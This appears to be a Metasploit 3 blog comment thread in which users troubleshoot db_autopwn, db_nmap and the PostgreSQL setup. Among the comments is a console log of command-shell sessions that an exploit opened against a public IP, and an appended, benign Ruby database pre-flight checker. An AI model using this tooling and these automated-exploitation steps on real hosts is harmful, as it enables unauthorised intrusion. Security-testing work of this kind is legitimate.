C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:632:in `call_filter'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:619:in `perform_action_without_benchmark'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/benchmarking.rb:66:in `perform_action_without_rescue'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/benchmark.rb:293:in `measure'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/benchmarking.rb:66:in `perform_action_without_rescue'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/rescue.rb:83:in `perform_action'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:430:in `send'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:430:in `process_without_filters'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:624:in `process_without_session_management_support'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/session_management.rb:114:in `process'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:330:in `process'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/dispatcher.rb:41:in `dispatch'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:113:in `handle_dispatch'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:79:in `service'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/httpserver.rb:104:in `service'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/httpserver.rb:65:in `run'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:162:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:95:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:92:in `each'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:92:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:23:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:82:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:63:in `dispatch'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/commands/servers/webrick.rb:59
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require'
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `require'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:495:in `require'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:342:in `new_constants_in'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:495:in `require'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/commands/server.rb:39
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require'
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `require'
./script/server:3
C:/Program Files/Metasploit/Framework3/framework/msfweb:82:in `load'
C:/Program Files/Metasploit/Framework3/framework/msfweb:82
(running)

12:23:00 AM  
Anonymous Anonymous said...

Is db_autopwn a Linux-only feature? On the Windows app, whenever it reaches the nmap step it says db_nmap is an unrecognized command. And I have nmap 4.20 already installed... Answers would be greatly appreciated.

5:58:00 PM  
Anonymous claudijd said...

HD,

I saw your "Tactical Exploitation" talk in Vegas earlier this month and attended the Q&A at Defcon 15. The demo of smb_relay was really eye opening. I really appreciate all the efforts of your team. The framework has really come a long way since I first started using it.

It was nice to see that you guys decided to bring it back to the roots and educate some of the younger guys on the topic of "CREATIVITY". I'm certain that creativity alone is what differentiates script kiddies from security professionals.

Keep up the good work!

4:17:00 PM  
Anonymous tothakosh said...

Hi,

when I execute
db_nmap -p 445 192.168.2.0/24

I get the following:

Error while running command db_nmap: FATAL C28000 Mno PostgreSQL user name specified in startup packet Fpostmaster.c L1528 RProcessStartupPacket
(nmap finishes fine, this message comes after)


db_create seems to work fine (tables are created)
I'm not quite sure about the ruby-postgres library, as I get an error when I do this check:
ruby -e 'require "rubygems"; require_gem "postgres";'

Could you help? Is it a database setting problem or something wrong with the ruby-postgres library installation?

Thanks

2:44:00 PM  
Anonymous Anonymous said...

Seriously cool stuff, this; many thanks to all of you involved.

12:53:00 PM  
Anonymous th3g33k said...

I've been Googling, trying to find answers to the error message I've been getting. I typed in the commands below on the console and it tells me that the metasploit3 database doesn't exist:


msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
FATAL: database "metasploit3" does not exist
psql: FATAL: database "metasploit3" does not exist
[*] Database creation complete (check for errors)

1:46:00 AM  
Anonymous Anonymous said...

I'm trying, but it didn't work:
db_create:
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
psql: could not connect to server: No such file or directory
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
[*] Database creation complete (check for errors)

Hope someone can help me.
best regards

8:23:00 AM  
Blogger afallenhope said...

I usually get command shells, but when I try to use them, either:
1.) when I use sessions -i 1 it automatically closes, or
2.) it's just a blank screen.

LOG:
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
2 Command shell 192.168.0.102:3690 -> 74.14.102.76:63294
3 Command shell 192.168.0.102:59389 -> 74.14.102.76:3690
4 Command shell 192.168.0.102:3690 -> 74.14.102.76:63296
5 Command shell 192.168.0.102:38573 -> 74.14.102.76:3690

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

[*] Command shell session 2 closed.

2:50:00 PM  
Blogger calli said...

Everything has been working great with the automated version of Metasploit, but I can't figure out which payload has worked out for me.
Is there any way I could find that out?

5:52:00 PM  
Blogger hdm said...

Run 'sessions -l -v', it will show you what exploit launched it.

6:25:00 PM  
Anonymous Anonymous said...

For people who use OS X: I had a lot of trouble getting "gem install postgres" to work. If you're getting an error saying it can't find the libraries and whatnot, you have to install postgres-devel-82 (not exactly sure on the name, but its close). If you still get an error, set ARCHFLAGS and try again by doing a "sudo env ARCHFLAGS="-arch i386" gem install postgres". If that doesn't work, Google.

Got it working on a new MacBook Pro. Unfortunately, the XP VM I have loaded was completely patched, so no success with consoles.

4:09:00 PM  
Blogger kike said...

For the postgres errors, you have to start the instance of postgres as another user (not root); then you can return to root. When you load db_postgres you have to use the command "db_create user:pass@host:port/db", where for the user you put the user you used to start the instance of postgres, and for the pass you can use anything. Then the DB will work with no problems.

12:10:00 PM  
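Several of the failures reported above come from the same three pre-conditions: the server must be reachable where libpq looks for it (the "could not connect ... /tmp/.s.PGSQL.5432" report), the connection string must carry a user name (tothakosh's "no PostgreSQL user name specified in startup packet"), and the Ruby driver must load (the "no such file to load" reports). The following pre-flight check is an added example; it is not part of the original post or of the Metasploit code base. It assumes the "user:pass@host:port/db" form quoted in kike's comment, the parser is an illustration rather than the plugin's own code, and it is written for a current Ruby rather than the 1.8 series the post targets.

```ruby
# Added example (not code from the original post or the Metasploit tree):
# pre-flight checks for the db_postgres plugin, built from the failures
# reported in the comments. Assumes the "user:pass@host:port/db" connection
# string form; the parser is an illustration, not the plugin's own code.
require 'socket'
require 'timeout'

DEFAULT_SOCKET = '/tmp/.s.PGSQL.5432' # path named in the "could not connect" error

# Split "user:pass@host:port/db" into its parts. Returns nil when the user
# name is missing, because the server rejects a startup packet without one
# ("no PostgreSQL user name specified in startup packet"). Passwords that
# contain '@', ':' or '/' are ambiguous in this form and also yield nil.
def parse_db_connect_string(str)
  m = %r{\A([^:@/]+)(?::([^@/:]*))?@([^:/@]+)(?::(\d+))?/([^/\s]+)\z}.match(str.to_s)
  return nil unless m
  { user: m[1], pass: m[2] || '', host: m[3], port: (m[4] || 5432).to_i, db: m[5] }
end

# True when something accepts connections on the Unix socket libpq uses by
# default. A missing file means the postmaster is not running (or was
# started with another unix_socket_directory); refused means not listening.
def unix_socket_listening?(path = DEFAULT_SOCKET)
  return false unless File.socket?(path)
  UNIXSocket.new(path).close
  true
rescue SystemCallError
  false
end

# True when a TCP listener answers on host:port (the host:port form of the
# connection string goes this way instead of through the socket file).
def tcp_listening?(host, port, timeout = 2)
  Timeout.timeout(timeout) { TCPSocket.new(host, port).close }
  true
rescue SystemCallError, IOError, Timeout::Error, SocketError
  false
end

# Counterpart of the post's require_gem check; require_gem is gone from
# modern RubyGems, so a plain require is used. Returns the driver that
# loaded ("pg" is the successor of the "postgres" gem) or nil.
def postgres_driver
  %w[postgres pg].each do |name|
    begin
      require name
      return name
    rescue LoadError
      next
    end
  end
  nil
end

# Run the checks and return the problems found, in the order the plugin
# would hit them. An empty array means db_create is worth trying.
def preflight(conn_str, socket_path: DEFAULT_SOCKET)
  conn = parse_db_connect_string(conn_str)
  return [:bad_connect_string] if conn.nil?
  problems = []
  reachable = unix_socket_listening?(socket_path) || tcp_listening?(conn[:host], conn[:port])
  problems << :server_unreachable unless reachable
  problems << :driver_missing if postgres_driver.nil?
  problems
end

if __FILE__ == $0
  conn = ARGV[0] || 'msf:msf@localhost:5432/metasploit3' # assumed sample string
  result = preflight(conn)
  puts(result.empty? ? "ok: try db_create #{conn}" : "problems: #{result.join(', ')}")
end
```

Run it with the same string you intend to hand to db_create; a `:bad_connect_string` result is the missing-user-name case, `:server_unreachable` is the socket-file case (start the postmaster as the non-root database owner, as kike notes, or pass host:port), and `:driver_missing` means gem install postgres has not produced a loadable library yet.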